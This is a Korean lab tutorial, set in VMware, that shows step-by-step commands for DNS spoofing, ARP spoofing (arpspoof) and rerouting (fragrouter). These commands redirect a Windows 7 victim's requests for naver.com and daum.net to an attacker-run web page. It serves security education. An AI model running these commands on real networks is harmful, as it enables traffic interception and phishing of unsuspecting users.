이 실습은 가상 환경에서 이루어진 것이며, 순수한 실험 목적임을 분명히 합니다.
실습에서 사용되는 모든 시스템은 VMWare에서 실행하고 있습니다.
Kali (Attacker) :
WEB srv : Windows 2000
DNS Srv : Windows 2008 R2
Client(Victim) : Windows 7 sp 1
시나리오:
공격자 시스템에서 DNS 스푸핑, ARP 스푸핑, Routing을 구현하여 피해자가 DNS(실제)서버에 질의 할때
공격자의 DNS에서 조작된 정보를 응답하여 공격자가 원하는 곳(웹서버)로 유인한다.
1. 공격자 시스템 (Kali)에서 다음과 같이 수행한다. 아래의 스텝을 진행할때 각각의 터미널창에서 진행합니다. 즉, 아래의 모든 작업은 4개의 터미널 창이 필요합니다.
1-1. 조작된 이름 정보를 생성한다.
# cat > hosts.txt
192.168.8.136 www.naver.com
192.168.8.136 www.daum.net
[설명] 192.168.8.136는 공격자의 웹서버 입니다. 실습에서는 Windows 2000서버에 해당됩니다.
1.2. DNS 스푸핑을 수행합니다.
# dnsspoof -i eth0 -f ./hosts.txt
1.3. ARP 스푸핑을 수행한다.
# arpspoof -i eth0 -t 192.168.3.131 192.168.8.2
[설명] 192.168.3.131는 피해자의 주소입니다. 실습에서는 Windows 7에 해당됩니다.
192.168.8.2는 실습에서 사용되고 있는 게이트웨이 주소 입니다. 이 실습에선 사용하고 있는 VMWare NAT (또는 VMnet 8)이 보유한 IP입니다.
1.4. Rerouting을 수행합니다.
# fragrouter -B1
2. Windows 2008 서버에서는 DNS 서비스가 실행을 하고 있습니다. DNS에 대한 설치와 영역생성은 여기에서 다루지 않겠습니다.
2.1. 실습의 완성도을 높이기 위해서 DNS캐쉬 영역을 clear해 주십시요.
3. Windows 7에서도 실습의 완성도를 높이기 위해서 캐시된 정보를 clear해 주십시요.
3-1. ipconfig /flushdns
[설명] 캐시된 정보를 clear 하는 명령어 입니다.
3.-2. ipconfig /displaydns
[설명] 캐시된 정보를 확인하는 명령입니다.
3.3. 웹서비스를 요청합니다.
http://www.naver.com
4. 결과를 봅니다.
실제 naver.com 사이트가 열리지 않고 공격자가 유도하는 웹서버가 열리면 성공적인 실습입니다.
혹 웹서버가 없는 경우 Kali에서 웹서버를 수행해도 됩니다. 다음을 수행할 경우 실습 상황에서 windows 2000웹서버는 필요하지 않습니다.
1. Kali에서 웹서버 생성과 서비스 실행합니다.
1.1. mv /var/www/html/index.html /var/ww/html/index.html.ori
[설명] 기본적으로 가진 index.html을 복사본 생성합니다. 실습이 완료된 후 되돌리기 위해서 입니다.
1.2 echo "Hacked WEB site" > /var/www/html/index.html
[설명] 피해자가 접속했을때 보여질 html문서을 생성한 것 입니다.
1.3. service apache2 start
[설명] 웹서버 데몬을 시작합니다.